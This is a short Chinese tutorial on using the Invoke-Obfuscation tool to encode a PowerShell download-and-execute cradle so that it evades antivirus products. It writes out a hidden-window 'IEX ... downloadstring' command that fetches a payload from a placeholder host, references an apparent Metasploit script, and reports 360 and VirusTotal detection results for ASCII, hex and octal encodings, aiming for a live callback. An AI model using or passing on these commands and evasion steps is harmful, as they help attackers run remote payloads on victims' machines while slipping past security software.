0x01 项目地址
https://github.com/danielbohannon/Invoke-Obfuscation
0x02 用法
- 生成powershell:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:80/b'))"
- 下载并用powershell进入项目目录执行:
Import-Module .\Invoke-Obfuscation.psd1;Invoke-Obfuscation
如果报错请先执行:Set-ExecutionPolicy Unrestricted
- 输入要混淆的PS:
set scriptblock 'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:80/b'))"'
(设置ps文件:set scriptpath C:\0_poweshell\msf-crow.ps1
)
- 输入
ENCODING
选择要编码的方式:
0x03 编码测试
1. ASCII
-
选择1:
-
输出:
out PowerShellCodeASCII.ps1
-
免杀与上线测试
- 360静态查杀:
- 360动态查杀:
- VT:5/58
2. Hex
-
undo
撤销上次命令:
-
编码并输出:
-
免杀与上线测试
-
360静态查杀:
-
360动态查杀:
-
VT:9/59
3. Octal
-
编码并输出:
-
免杀与上线测试
-
360静态查杀:
-
360动态查杀:
-
VT:7/58
不再赘述。。。